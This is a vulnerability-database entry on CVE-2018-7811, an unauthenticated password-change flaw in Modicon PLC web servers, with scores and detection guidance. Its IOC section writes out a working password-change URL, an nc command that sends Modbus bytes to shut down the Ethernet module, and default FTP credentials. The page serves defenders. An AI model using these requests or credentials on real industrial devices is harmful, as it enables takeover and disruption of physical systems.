cbcvebase.
CVE-2018-7811
published 2018-11-30

CVE-2018-7811: An Unverified Password Change vulnerability exists in the embedded web servers in all Modicon M340, Premium, Quantum PLCs and BMXNOR0200 which could allow an…

PriorityP267critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EPSS
3.50%
87.7th percentile
An Unverified Password Change vulnerability exists in the embedded web servers in all Modicon M340, Premium, Quantum PLCs and BMXNOR0200 which could allow an unauthenticated remote user to access the change password function of the web server

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://[ip]/unsecure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User
path/unsecure/embedded/builtin
path/secure/embedded/builtin
port502
commandecho -ne "\x0\xa8\x0\x0\x0\x5\x0\x5a\x0\x7\x0" | nc 192.168.238.30 502
bytes
\x0\xa8\x0\x0\x0\x5\x0\x5a\x0\x7\x0
  • Detect unauthenticated HTTP GET requests to /unsecure/embedded/builtin containing password-change parameters (passwd=, cnfpasswd=, subhttppwd=Save+User) from unauthenticated sources — this is the CVE-2018-7811 attack vector.
  • Monitor for HTTP GET requests to /secure/embedded/builtin with password-change query parameters (passwd=, cnfpasswd=, subhttppwd=Save+User) — absence of anti-CSRF token and no current-password requirement makes CSRF exploitation (CVE-2018-7831) detectable by this pattern.
  • Alert on Modbus TCP traffic to port 502 on Modicon devices containing the byte sequence \x00\xa8\x00\x00\x00\x05\x00\x5a\x00\x07\x00, which triggers a complete shutdown of the Ethernet module.
  • Flag use of known default credentials on Modicon FTP services: sysdiag/factorycast@schneider, fdrusers/sresurdf, fwupgrade/FaAmU5p2F~, loki/ZfTljublsx.
  • ·The unauthenticated password-change endpoint (/unsecure/embedded/builtin) is distinct from the authenticated endpoint (/secure/embedded/builtin); detection rules must cover both paths to catch both unauthenticated (CVE-2018-7811) and CSRF-based (CVE-2018-7831) attack scenarios.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.